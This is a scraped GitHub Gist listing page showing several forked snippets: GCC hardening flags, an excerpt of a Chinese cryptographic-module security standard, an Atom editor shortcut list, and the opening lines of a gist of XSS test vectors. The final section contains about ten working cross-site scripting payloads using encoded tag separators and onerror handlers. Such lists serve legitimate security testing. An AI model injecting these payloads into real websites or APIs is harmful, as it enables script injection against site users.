Skip to content

Instantly share code, notes, and snippets.

@a1exlism
a1exlism / gcc-security.txt
Created June 9, 2023 08:03 — forked from jrelo/gcc-security.txt
GCC security related flags reference.
Source material:
http://security.stackexchange.com/questions/24444/what-is-the-most-hardened-set-of-options-for-gcc-compiling-c-c
https://wiki.gentoo.org/wiki/Hardened_Gentoo
https://wiki.debian.org/Hardening
================================================================================================================>
GCC Security related flags and options:
CFLAGS="-fPIE -fstack-protector-all -D_FORTIFY_SOURCE=2"
LDFLAGS="-Wl,-z,now -Wl,-z,relro"

from http://www.sanlen.com/news/e7/2014-02-24/sl_news_41573.htm 1 范围

本标准提出了用于保护计算机与通信系统内部敏感信息的安全系统内使用的密码模块的安全要求。本标准为密码模块定义了四个安全等级,以满足不同安全等级要求的敏感数据及多样化的应用环境的安全需求。本标准划分了10个安全领域,在每种安全领域中定义了四个安全等级,每一种安全等级都比较低的安全等级提供了更高的安全性。 
本标准适用于密码模块的安全性检测,亦可用于指导密码模块的设计、开发和测试工作。 

2 规范性引用文件 

下列文件对于本文件的应用是必不可少的。凡是注日期的引用文件,仅注日期的版本适用于本文件。凡是不注日期的引用文件,其最新版本(包括所有的修改单)适用于本文件。 

GM/T 0005 随机性检测规范

@a1exlism
a1exlism / Atom Editor Cheat Sheet (Sweetmeat).md
Last active November 21, 2018 02:15 — forked from chrissimpkins/gist:5bf5686bae86b8129bee
Atom Editor Cheat Sheet (Sweetmeat)

Use these rapid keyboard shortcuts to control the GitHub Atom text editor on Mac OSX.

Key to the Keys

  • ⌘ : Command key
  • ⌃ : Control key
  • ⌫ : Delete key
  • ← : Left arrow key
  • → : Right arrow key
@a1exlism
a1exlism / 666_lines_of_XSS_vectors.html
Created July 26, 2016 03:37 — forked from JohannesHoppe/666_lines_of_XSS_vectors.html
666 lines of XSS vectors, suitable for attacking an API copied from http://pastebin.com/48WdZR6L
<script\x20type="text/javascript">javascript:alert(1);</script>
<script\x3Etype="text/javascript">javascript:alert(1);</script>
<script\x0Dtype="text/javascript">javascript:alert(1);</script>
<script\x09type="text/javascript">javascript:alert(1);</script>
<script\x0Ctype="text/javascript">javascript:alert(1);</script>
<script\x2Ftype="text/javascript">javascript:alert(1);</script>
<script\x0Atype="text/javascript">javascript:alert(1);</script>
'`"><\x3Cscript>javascript:alert(1)</script>
'`"><\x00script>javascript:alert(1)</script>
<img src=1 href=1 onerror="javascript:alert(1)"></img>